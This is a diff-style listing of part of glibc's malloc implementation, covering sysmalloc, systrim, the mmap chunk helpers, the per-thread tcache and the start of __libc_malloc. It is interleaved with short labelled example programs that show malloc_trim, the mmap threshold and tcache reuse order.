+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
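
For context, the public entry point that ends up in systrim for the main arena is malloc_trim from <malloc.h>. The following standalone sketch is an illustration only (it is not part of this file); it assumes a brk-backed main arena and raises the trim threshold so the release happens on the explicit malloc_trim call rather than automatically inside free.

#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  /* Keep free() from trimming automatically so the effect is visible.  */
  mallopt (M_TRIM_THRESHOLD, 512 * 1024 * 1024);

  /* Grow the main arena's top chunk with brk-backed allocations
     (each request stays below the default mmap threshold).  */
  void *blocks[64];
  for (int i = 0; i < 64; i++)
    blocks[i] = malloc (64 * 1024);
  for (int i = 0; i < 64; i++)
    free (blocks[i]);

  /* malloc_trim reaches systrim for the main arena and returns 1
     only if memory was actually handed back to the kernel.  */
  printf ("malloc_trim(0) = %d\n", malloc_trim (0));
  return 0;
}
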
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
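
munmap_chunk is only reached for chunks carrying the IS_MMAPPED bit, i.e. requests large enough to be served by mmap instead of an arena. A small illustrative program (not part of this file; it assumes the mallopt knobs available in these glibc builds) lowers the mmap threshold so the two free paths can be compared:

#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  /* Push even modest requests onto the mmap path.  */
  mallopt (M_MMAP_THRESHOLD, 4096);

  void *big = malloc (64 * 1024);   /* above the threshold: mmapped chunk */
  void *small = malloc (64);        /* below it: served from the arena    */

  /* The mmapped block's usable size reflects whole-page granularity.  */
  printf ("big   usable = %zu\n", malloc_usable_size (big));
  printf ("small usable = %zu\n", malloc_usable_size (small));

  free (big);     /* takes the munmap_chunk path above */
  free (small);   /* goes back to the tcache/bins      */
  return 0;
}
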
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   chunks available to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
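
The effect of tcache_put and tcache_get is easy to observe from user code: frees of one size are stacked LIFO in that size's bin and handed straight back by the next mallocs of the same size. A minimal sketch (reuse order is an implementation detail of tcache-enabled builds such as those bundled here, not something any API guarantees):

#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  void *a = malloc (24);
  void *b = malloc (24);

  free (a);                 /* tcache_put: bin now holds a             */
  free (b);                 /* tcache_put: b pushed on top of a (LIFO) */

  void *c = malloc (24);    /* tcache_get: expected to return b */
  void *d = malloc (24);    /* tcache_get: expected to return a */

  printf ("a=%p b=%p\nc=%p d=%p\n", a, b, c, d);
  return 0;
}
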
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
